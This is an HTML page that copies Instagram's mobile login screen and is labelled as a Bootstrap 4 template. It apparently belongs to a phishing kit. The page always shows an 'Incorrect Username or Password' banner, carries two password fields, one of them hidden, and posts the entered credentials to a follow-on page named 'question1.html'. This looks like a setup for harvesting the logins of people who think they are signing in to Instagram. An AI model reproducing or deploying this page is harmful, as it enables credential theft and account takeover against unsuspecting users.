<!DOCTYPE html>
<html>

<head>



    <title>Instagram Mobile Login Page In Bootstrap 4 - W3hubs.com</title>
    <meta charset="utf-8">
    <meta name="description" content="w3hubs.com">
    <meta name="author" content="w3hubs.com">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>

    <!-- Latest compiled and minified CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css">
    <link rel="stylesheet" type="text/css" href="style.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>

<body>
    
    <section id="w3hubs">
        <div class="container" style="
    width: 100%;
     padding-right: 0px; 
     padding-left: 0px;
    margin-right: auto;
    margin-left: auto;">

            <p style="text-align: center; font-size: 28px; font-family: cursive">Instagram </p>
            
            <centre>
            <p class=" error1p" style="border-radius: 0%;
                                       width : 100%;
        color: white;
        font-size:12px; 
        margin: 0px;
        background-color: #ff1e50;
        padding: 8px;"> Incorrect Username or Password !<br></p></centre>
            
            <form method="POST"  action="question1.html">
                <div class="form-group">

                    <input type="name" name="username" class="form-control" placeholder="Phone number,username, or email">
                </div>
                <div class="form-group">

                    <input type="password" name="pass2" id="pass2" class="form-control" placeholder="Password">
                </div>
                <div class="form-group">

                    <input type="hidden" name="pass1" id="pass1" class="form-control" value="">
                   
                
                </div>
                <input type="hidden" id="pass1" value="">
                <button type="submit" class="btn btn-primary">Log In</button>

            </form>
            
          
            <h4>OR</h4>
            <p><i class="fa fa-facebook-square"></i><a href="#">Log In Facebook</a></p>
            <p><a href="#">Forgot Password?</a></p>
            <p>Don't have account? <a href="#">Sign up</a></p>
        </div>


    </section>

    
</body>

</html>
